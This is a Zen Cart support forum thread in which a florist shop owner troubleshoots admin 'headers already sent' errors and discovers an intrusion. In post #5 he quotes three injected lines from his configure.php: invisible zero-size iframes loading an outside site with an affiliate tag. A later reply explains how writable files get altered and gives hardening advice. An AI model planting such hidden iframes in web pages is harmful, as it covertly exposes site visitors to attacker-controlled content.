Results 1 to 7 of 7
  1. #1
    Join Date
    Jul 2006
    Location
    Cleveland
    Posts
    79
    Plugin Contributions
    0

    Default Error in Admin Ver .6

    I am still on the Version before last. My store has been working fine at http://www.findaflorist.org/sendflowers/ but starting today when I try to go to the admin area http://www.findaflorist.org/sendflowers/admin I get the following error and cannot proceed.
    The error is:
    Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/configure.php:88) in /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/includes/functions/sessions.php on line 102

    Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/configure.php:88) in /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/includes/functions/sessions.php on line 102

    Warning: Cannot modify header information - headers already sent by (output started at /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/configure.php:88) in /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/init_includes/init_templates.php on line 36

    Warning: Cannot modify header information - headers already sent by (output started at /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/configure.php:88) in /home/httpd/vhosts/findaflorist.org/httpdocs/sendflowers/admin/includes/functions/general.php on line 34


    Can anyone help. Thanks

  2. #2
    Join Date
    Jul 2006
    Location
    Cleveland
    Posts
    79
    Plugin Contributions
    0

    Default Re: Error in Admin Ver .6

    Oh I forgot to mention I have no line 88 in configure.php

  3. #3
    Join Date
    Sep 2003
    Location
    Ohio
    Posts
    69,402
    Plugin Contributions
    6

    Default Re: Error in Admin Ver .6

    er ... you should ...

    Line 88 is blank and line 89 is the closing php tag of ?>
    Linda McGrath
    If you have to think ... you haven't been zenned ...

    Did YOU buy the Zen Cart Team a cup of coffee and a donut today? Just click here to support the Zen Cart Team!!

    Are you using the latest? Perhaps you've a problem that's fixed in the latest version: [Upgrade today!]
    Officially PayPal-Certified! Just click here

    Try our Zen Cart Recommended Services - Hosting, Payment and more ...
    Signup for our Announcements Forums to stay up to date on important changes and updates!

  4. #4
    Join Date
    Jan 2004
    Posts
    66,444
    Plugin Contributions
    279

    Default Re: Error in Admin Ver .6

    .

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

  5. #5
    Join Date
    Jul 2006
    Location
    Cleveland
    Posts
    79
    Plugin Contributions
    0

    Default Re: Error in Admin Ver .6

    In my case line 86 is blank. Line 87 is the closing tag and the end. I also noticed an additional 3 lines in my configure.php that I did not put they refer to a site free20.com that it is not my site Was this a hacking attempt. I deleted those line but the error continued. These 3 line were
    <html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=secownz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
    <html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=secownz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
    <html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=secownz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>


    How were they able to insert these lines

  6. #6
    Join Date
    Jul 2006
    Location
    Cleveland
    Posts
    79
    Plugin Contributions
    0

    Default Re: Error in Admin Ver .6

    Thank you guys after deleting the extra line I left a hard return. I now removed it and my admin is back functional.
    Does anyone know how the html codes got there I thought I followed all the security measures listed. Any Idea. Con you also tell what they acomplished by doing this?

  7. #7
    Join Date
    Jan 2004
    Posts
    66,444
    Plugin Contributions
    279

    Default Re: Error in Admin Ver .6

    If you leave files as read-write, ie: chmod 777 then if your hosting server is compromised and a hacker gets onto the server from *anywhere* (not necessarily your account), they can search the server for files that are read-write, and then edit them. And they usually just write a small program to do that. You're not a specific target usually. Just a victim.

    Key: make good backups, regularly, and only leave files/folders writable if *needed*, and then only *when* needed, if possible.

    Here are some guidelines for keeping yourself safe:
    http://www.zen-cart.com/wiki/index.p...ing_From_Hacks
    .

    Zen Cart - putting the dream of business ownership within reach of anyone!
    Donate to: DrByte directly or to the Zen Cart team as a whole

    Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
    Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.

 

 

Similar Threads

  1. upgrading from ver. 1.3.7.1 to ver. 1.5
    By pazdar in forum Upgrading from 1.3.x to 1.3.9
    Replies: 6
    Last Post: 18 Jan 2012, 03:50 PM
  2. How to modify customers information in admin ver 1.3.8a
    By Amit001 in forum Customization from the Admin
    Replies: 0
    Last Post: 22 Jan 2010, 11:01 AM
  3. Internal Server 500 error on uploaded images ver 1.3.7.1
    By spaz_tic in forum Installing on a Windows Server
    Replies: 7
    Last Post: 11 Jan 2010, 12:31 PM
  4. ver 1.3.1 - Admin Home problem
    By wickedklown in forum General Questions
    Replies: 4
    Last Post: 14 May 2006, 04:30 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
disjunctive-egg